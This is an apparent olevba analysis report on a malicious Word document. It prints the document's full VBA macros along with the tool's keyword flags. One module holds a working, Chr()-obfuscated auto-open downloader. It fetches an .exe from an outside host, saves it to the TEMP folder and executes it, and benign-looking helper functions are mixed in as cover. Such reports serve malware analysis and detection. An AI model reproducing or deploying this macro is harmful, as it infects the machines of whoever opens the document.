Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MAS-H-- 000001.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 000001.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 000001.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub FFewegUU1(FUU2 As Long)
17. mp268P5dmPj6hB
18. End Sub
19.  
20. Sub autoopen()
21. FFewegUU1 (866)
22.  
23. End Sub
24.  
25. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
26. ANALYSIS:
27. +----------+----------+---------------------------------------+
28. | Type     | Keyword  | Description                           |
29. +----------+----------+---------------------------------------+
30. | AutoExec | AutoOpen | Runs when the Word document is opened |
31. +----------+----------+---------------------------------------+
32. -------------------------------------------------------------------------------
33. VBA MACRO M11.bas
34. in file: 000001.doc - OLE stream: u'Macros/VBA/M11'
35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
36. Private Type tagInitCommonControlsEx
37.    lngSize As Long
38.    lngICC As Long
39. End Type
40.  
41. Private Const ICC_USEREX_CLASSES = &H200
42.  
43. Public Function InitXpStyle() As Boolean
44.    On Error Resume Next
45.    Dim iccex As tagInitCommonControlsEx
46.    ' Ensure CC available:
47.   With iccex
48.        .lngSize = LenB(iccex)
49.        .lngICC = ICC_USEREX_CLASSES
50.    End With
51.    InitXpStyle = (Err.Number = 0)
52.    On Error GoTo 0
53. End Function
54.  
55. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
56. ANALYSIS:
57. No suspicious keyword or IOC found.
58. -------------------------------------------------------------------------------
59. VBA MACRO Module1.bas
60. in file: 000001.doc - OLE stream: u'Macros/VBA/Module1'
61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
62.  
63. Public Function RandomNumber(Upper As Integer, _
64.      Lower As Integer) As Integer
65.     'Generates a Random Number BETWEEN the LOWER and UPPER values
66.    Randomize
67.     RandomNumber = Int((Upper - Lower + 1) * Rnd + Lower)
68. End Function
69.  
70.  
71. Public Function QN7pFLiUlj5(ZLJXSAoSKjsg As String)
72.     Set qQ7z6L8p5v2w = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & "l" & "i" & Chr(99) & Chr(97) & Chr(116) & Chr(105) & "o" & "n")
73. qQ7z6L8p5v2w.Open (ipekwUxeEk8dG)
74. End Function
75.  
76.  
77.  
78.  
79. Function RandomString(cb As Integer) As String
80.     Randomize
81.     Dim rgch As String
82.     rgch = "abcdefghijklmnopqrstuvwqyz"
83.     rgch = rgch & UCase(rgch)
84.     RandomString = Mid$(rgch, Int(Rnd * Len(rgch) + 1), 1)
85.     rgch = rgch & "0123456789"
86.     Dim i As Long
87.     For i = 1 To cb
88.         RandomString = RandomString & Mid$(rgch, Int(Rnd * Len(rgch) + 1), 1)
89.     Next i
90. End Function
91.  
92.  
93. Public Function DBzfavone(CRSjLxvDjAsERi As String)
94.     Set DBzfavone = CreateObject(CRSjLxvDjAsERi)
95. End Function
96. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
97. ANALYSIS:
98. +------------+--------------+-----------------------------------------+
99. | Type       | Keyword      | Description                             |
100. +------------+--------------+-----------------------------------------+
101. | Suspicious | Open         | May open a file                         |
102. | Suspicious | Chr          | May attempt to obfuscate specific       |
103. |            |              | strings                                 |
104. | Suspicious | CreateObject | May create an OLE object                |
105. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
106. |            |              | be used to obfuscate strings (option    |
107. |            |              | --decode to see all)                    |
108. +------------+--------------+-----------------------------------------+
109. -------------------------------------------------------------------------------
110. VBA MACRO Module2.bas
111. in file: 000001.doc - OLE stream: u'Macros/VBA/Module2'
112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
113. Public ipekwUxeEk8dG As String
114. Sub mp268P5dmPj6hB()
115.  
116. Dim uDXIWGiqPdonzr: Set uDXIWGiqPdonzr = DBzfavone("M" & Chr(105) & Chr(99) & "r" & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & "H" & Chr(84) & "T" & Chr(80))
117.  
118. Dim DAp2f0xJbq: Set DAp2f0xJbq = DBzfavone(Chr(65) & Chr(100) & "o" & Chr(100) & Chr(98) & "." & Chr(83) & "t" & Chr(114) & "e" & "a" & Chr(109))
119.  
120. uDXIWGiqPdonzr.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & "/" & Chr(109) & Chr(101) & "r" & Chr(99) & Chr(117) & Chr(114) & "y" & "." & Chr(112) & "o" & Chr(119) & "e" & "r" & Chr(119) & "e" & Chr(97) & "v" & Chr(101) & "." & "c" & Chr(111) & "m" & Chr(47) & Chr(55) & Chr(50) & Chr(47) & Chr(49) & Chr(49) & Chr(46) & "e" & Chr(120) & Chr(101), False
121. uDXIWGiqPdonzr.Send
122.  
123. Set DHyz2v5mICG8 = DBzfavone("W" & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l")
124.  
125. Set YFKDZBHThU = DHyz2v5mICG8.Environment("P" & "r" & "o" & Chr(99) & Chr(101) & "s" & Chr(115))
126.  
127. qK8feLrqC67 = YFKDZBHThU("T" & Chr(69) & Chr(77) & Chr(80))
128.  
129. ipekwUxeEk8dG = qK8feLrqC67 & Chr(92) & "r" & Chr(105) & "b" & Chr(97) & "s" & Chr(105) & "m" & "l" & "." & "e" & Chr(120) & Chr(101)
130.  
131.   NmfekJVEW = uDXIWGiqPdonzr.responseBody
132. On Error GoTo Elhczuh7a
133.     a = 132 / 0
134.   On Error GoTo 0
135.  
136. On Error GoTo FeEH4er
137.     b = 56 / 0
138.   On Error GoTo 0
139. vtDXeES9ee:
140.   Exit Sub
141. Elhczuh7a:
142.     With DAp2f0xJbq
143.        .Type = 1
144.         .Open
145.         .write NmfekJVEW
146.         .savetofile ipekwUxeEk8dG, 2
147.     End With
148.    
149. FeEH4er:
150.   QN7pFLiUlj5 ("NcJdYOPr1F")
151. Resume vtDXeES9ee
152. End Sub
153.  
154. Public Function RandomNumbers(Upper As Integer, _
155.    Optional Lower As Integer = 1, _
156.    Optional HowMany As Integer = 1, _
157.    Optional Unique As Boolean = True) As Variant
158. '*******************************************************
159.    'This Function generates random array of
160.    'Numbers between Lower & Upper
161.    'In Addition parameters can include whether
162.    'UNIQUE values are required
163.  
164.    'Note the Result is INCLUSIVE of the Range
165.  
166.     'Debug Example:
167.    'x = RandomNumbers(49, 1, 7)
168.    'For n = LBound(x) To UBound(x): Debug.Print x(n);: Next n
169.    'WARNING HowMany MUST be greater than (Higher - Lower)
170.    '******************************************************
171.  
172.     On Error GoTo LocalError
173.     If HowMany > ((Upper + 1) - (Lower - 1)) Then Exit Function
174.     Dim X           As Integer
175.     Dim n           As Integer
176.     Dim arrNums()   As Variant
177.     Dim colNumbers  As New Collection
178.    
179.     ReDim arrNums(HowMany - 1)
180.     With colNumbers
181.         'First populate the collection
182.        For X = Lower To Upper
183.             .Add X
184.         Next X
185.         For X = 0 To HowMany - 1
186.             n = RandomNumber(0, colNumbers.Count + 1)
187.             arrNums(X) = colNumbers(n)
188.             If Unique Then
189.                 colNumbers.Remove n
190.             End If
191.         Next X
192.     End With
193.     Set colNumbers = Nothing
194.     RandomNumbers = arrNums
195. Exit Function
196. LocalError:
197.     'Justin (just in case)
198.    RandomNumbers = ""
199. End Function
200.  
201. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
202. ANALYSIS:
203. +------------+------------+-----------------------------------------+
204. | Type       | Keyword    | Description                             |
205. +------------+------------+-----------------------------------------+
206. | Suspicious | Open       | May open a file                         |
207. | Suspicious | Chr        | May attempt to obfuscate specific       |
208. |            |            | strings                                 |
209. | Suspicious | SaveToFile | May create a text file                  |
210. | Suspicious | Write      | May write to a file (if combined with   |
211. |            |            | Open)                                   |
212. +------------+------------+-----------------------------------------+
213. -------------------------------------------------------------------------------
214. VBA MACRO M3.bas
215. in file: 000001.doc - OLE stream: u'Macros/VBA/M3'
216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
217. Public Const gsTOOLBARNAME As String = "ToolbarName"
218.  
219.  
220.  
221.  
222. Public Sub DeleteBar()
223.     On Error Resume Next
224.         Application.CommandBars(gsTOOLBARNAME).Delete
225.     On Error GoTo 0
226. End Sub
227.  
228. Public Sub BuildBar()
229.    
230.     Dim cbrBar As CommandBar
231.     Dim ctlButton As CommandBarButton
232.     Dim ctlDropDown As CommandBarPopup
233.    
234.     On Error Resume Next
235.         Application.CommandBars(gsTOOLBARNAME).Delete
236.     On Error GoTo 0
237.    
238.     ' Create the command bar.
239.    Set cbrBar = Application.CommandBars.Add(gsTOOLBARNAME, _
240.                                         msoBarTop, False, True)
241.     cbrBar.Visible = True
242.    
243.     ' Add the controls required by our application.
244.    Set ctlButton = cbrBar.Controls.Add(msoControlButton)
245.     With ctlButton
246.         .Style = msoButtonIconAndCaption
247.         .Caption = "CAPTION"
248.         .FaceId = 107
249.         .OnAction = "module.Sub"
250.     End With
251.  
252. End Sub
253.  
254. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
255. ANALYSIS:
256. No suspicious keyword or IOC found.
257. -------------------------------------------------------------------------------
258. VBA MACRO Module3.bas
259. in file: 000001.doc - OLE stream: u'Macros/VBA/Module3'
260. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
261.  
262. Option Explicit
263. Public Function Add_UniqueItem(ByRef cboBox As ComboBox, ByRef itemText As String, Optional ByVal cmpMethod As VbCompareMethod = vbBinaryCompare) As Boolean
264.         '<EhHeader>
265.        On Error GoTo Add_UniqueItem_Err
266.         '</EhHeader>
267.  
268.     Dim i As Long
269.  
270. 100 Add_UniqueItem = False
271.  
272. 102 If cboBox Is Nothing Then Exit Function
273.  
274. 104 With cboBox
275.  
276. 106     For i = 0 To .ListCount
277. 108         If StrComp(.List(i), itemText, cmpMethod) = 0 Then Exit Function
278.         Next
279.        
280. 110     .AddItem itemText
281.  
282.     End With
283.  
284. 112 Add_UniqueItem = True
285.  
286.         '<EhFooter>
287.        Exit Function
288.  
289. Add_UniqueItem_Err:
290.         MsgBox Err.Description & vbCrLf & _
291.                "in ssMDBQuery.MComboboxHelper.Add_UniqueItem " & _
292.                "at line " & Erl
293.         Resume Next
294.         '</EhFooter>
295. End Function
296.  
297.  
298. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
299. ANALYSIS:
300. No suspicious keyword or IOC found.